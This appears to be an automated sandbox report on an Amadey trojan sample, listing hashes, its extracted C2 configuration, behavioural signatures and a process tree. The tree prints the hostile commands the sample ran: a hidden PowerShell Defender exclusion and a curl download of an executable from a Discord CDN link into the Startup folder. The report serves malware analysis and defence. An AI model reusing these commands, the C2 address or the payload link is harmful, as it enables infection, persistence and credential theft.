Overview

overview

10

Static

static

3

aa8fd743b2...0a.exe

windows7-x64

10

aa8fd743b2...0a.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-11-2024 21:13

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    aa8fd743b218ec89cf0d2f273026dec78b9ca5e76aacc472d0f87cb48057a00a.exe

  • Size

    3.1MB

  • MD5

    5414a4ee71faf061656cf6e5799f6814

  • SHA1

    131d118f0a2a8b8347f81dccf232c1126581a48e

  • SHA256

    aa8fd743b218ec89cf0d2f273026dec78b9ca5e76aacc472d0f87cb48057a00a

  • SHA512

    ab30851216dde32626a62ecaeaab6289d2239a4b8547726fece82c3a744e6deee7ce9886cd1cf8d03ffb95d05a02386a6ecf583099cc803a87517ed20b5d3b87

  • SSDEEP

    49152:2z+UsTxH00MQH4F6yyqG0pQKvH4uKtBbD1ajFa:2z4H5MQYF65GqKwfrbpajFa

Score
10/10
amadey9c9aa5credential_accessdiscoveryevasionexecutionpersistencespywarestealertrojanupx

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
    evasiontrojan
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
    evasion
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 16 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 10 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    evasion
  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Windows security modification 2 TTPs 2 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 53 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aa8fd743b218ec89cf0d2f273026dec78b9ca5e76aacc472d0f87cb48057a00a.exe
    "C:\Users\Admin\AppData\Local\Temp\aa8fd743b218ec89cf0d2f273026dec78b9ca5e76aacc472d0f87cb48057a00a.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4428
      • C:\Users\Admin\AppData\Local\Temp\1006051001\0afa5201ee.exe
        "C:\Users\Admin\AppData\Local\Temp\1006051001\0afa5201ee.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:924
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0afa5201ee.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
          4⤵
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:7020
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7ffd4bb746f8,0x7ffd4bb74708,0x7ffd4bb74718
            5⤵
              PID:7032
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,1847429925813372503,11964092504733742008,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
              5⤵
                PID:5712
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,1847429925813372503,11964092504733742008,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                PID:5720
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,1847429925813372503,11964092504733742008,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
                5⤵
                  PID:5796
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1847429925813372503,11964092504733742008,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
                  5⤵
                    PID:5972
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1847429925813372503,11964092504733742008,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                    5⤵
                      PID:5976
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,1847429925813372503,11964092504733742008,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4088 /prefetch:1
                      5⤵
                        PID:5556
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0afa5201ee.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
                      4⤵
                        PID:5960
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd4bb746f8,0x7ffd4bb74708,0x7ffd4bb74718
                          5⤵
                            PID:4108
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,6943516340797157162,15082265240667970039,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
                            5⤵
                              PID:872
                        • C:\Users\Admin\AppData\Local\Temp\1006052001\2a228bf84d.exe
                          "C:\Users\Admin\AppData\Local\Temp\1006052001\2a228bf84d.exe"
                          3⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Loads dropped DLL
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Checks processor information in registry
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:2232
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
                            4⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Modifies data under HKEY_USERS
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of WriteProcessMemory
                            PID:2024
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd4f96cc40,0x7ffd4f96cc4c,0x7ffd4f96cc58
                              5⤵
                                PID:2816
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2024,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2020 /prefetch:2
                                5⤵
                                  PID:4288
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1944,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2056 /prefetch:3
                                  5⤵
                                    PID:2516
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2404 /prefetch:8
                                    5⤵
                                      PID:4484
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:1716
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3228,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3256 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:388
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4524,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4556 /prefetch:1
                                      5⤵
                                      • Uses browser remote debugging
                                      PID:368
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4680,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4628 /prefetch:8
                                      5⤵
                                        PID:1924
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4752,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4628 /prefetch:8
                                        5⤵
                                          PID:5204
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4748 /prefetch:8
                                          5⤵
                                            PID:5512
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4836,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5092 /prefetch:8
                                            5⤵
                                              PID:5560
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5088,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5236 /prefetch:8
                                              5⤵
                                                PID:5596
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5376,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5384 /prefetch:8
                                                5⤵
                                                  PID:5964
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5504,i,3463810996140363347,2822113355496758354,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5416 /prefetch:2
                                                  5⤵
                                                  • Uses browser remote debugging
                                                  PID:6468
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                4⤵
                                                • Uses browser remote debugging
                                                • Enumerates system info in registry
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                • Suspicious use of FindShellTrayWindow
                                                PID:6256
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd4bb746f8,0x7ffd4bb74708,0x7ffd4bb74718
                                                  5⤵
                                                  • Checks processor information in registry
                                                  • Enumerates system info in registry
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:6268
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15573096990214214853,6812432016601697485,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:2
                                                  5⤵
                                                    PID:6504
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,15573096990214214853,6812432016601697485,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 /prefetch:3
                                                    5⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:6512
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,15573096990214214853,6812432016601697485,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2980 /prefetch:8
                                                    5⤵
                                                      PID:6620
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2064,15573096990214214853,6812432016601697485,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                      5⤵
                                                      • Uses browser remote debugging
                                                      PID:6680
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2064,15573096990214214853,6812432016601697485,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                                                      5⤵
                                                      • Uses browser remote debugging
                                                      PID:6688
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2064,15573096990214214853,6812432016601697485,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:1
                                                      5⤵
                                                      • Uses browser remote debugging
                                                      PID:3220
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2064,15573096990214214853,6812432016601697485,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
                                                      5⤵
                                                      • Uses browser remote debugging
                                                      PID:5140
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\DocumentsFBFHDBKJEG.exe"
                                                    4⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:6228
                                                    • C:\Users\Admin\DocumentsFBFHDBKJEG.exe
                                                      "C:\Users\Admin\DocumentsFBFHDBKJEG.exe"
                                                      5⤵
                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                      • Checks BIOS information in registry
                                                      • Executes dropped EXE
                                                      • Identifies Wine through registry keys
                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:7040
                                                • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                  3⤵
                                                    PID:3076
                                                  • C:\Users\Admin\AppData\Local\Temp\1006054001\79708bdec7.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1006054001\79708bdec7.exe"
                                                    3⤵
                                                    • Modifies Windows Defender Real-time Protection settings
                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                    • Checks BIOS information in registry
                                                    • Executes dropped EXE
                                                    • Identifies Wine through registry keys
                                                    • Windows security modification
                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                    • System Location Discovery: System Language Discovery
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2812
                                                  • C:\Users\Admin\AppData\Local\Temp\1006055001\babababa.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\1006055001\babababa.exe"
                                                    3⤵
                                                    • Executes dropped EXE
                                                    PID:6136
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /d /s /c "C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"
                                                      4⤵
                                                        PID:5780
                                                        • C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe
                                                          C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe
                                                          5⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          PID:5876
                                                          • C:\Windows\system32\cmd.exe
                                                            "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CB69.tmp\CB7A.tmp\CB8A.bat C:\Users\Admin\AppData\Local\Temp\decrypted_executable.exe"
                                                            6⤵
                                                              PID:6344
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -w hidden -c Add-MpPreference -ExclusionPath ""
                                                                7⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5628
                                                              • C:\Windows\system32\curl.exe
                                                                curl --silent --output "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe" "https://cdn.discordapp.com/attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff&"
                                                                7⤵
                                                                • Drops startup file
                                                                PID:6612
                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe
                                                                "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DataStore1.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                PID:6944
                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                    1⤵
                                                      PID:4020
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                      1⤵
                                                        PID:1596
                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                        1⤵
                                                          PID:5928
                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                          1⤵
                                                            PID:2936
                                                          • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                            C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                            1⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
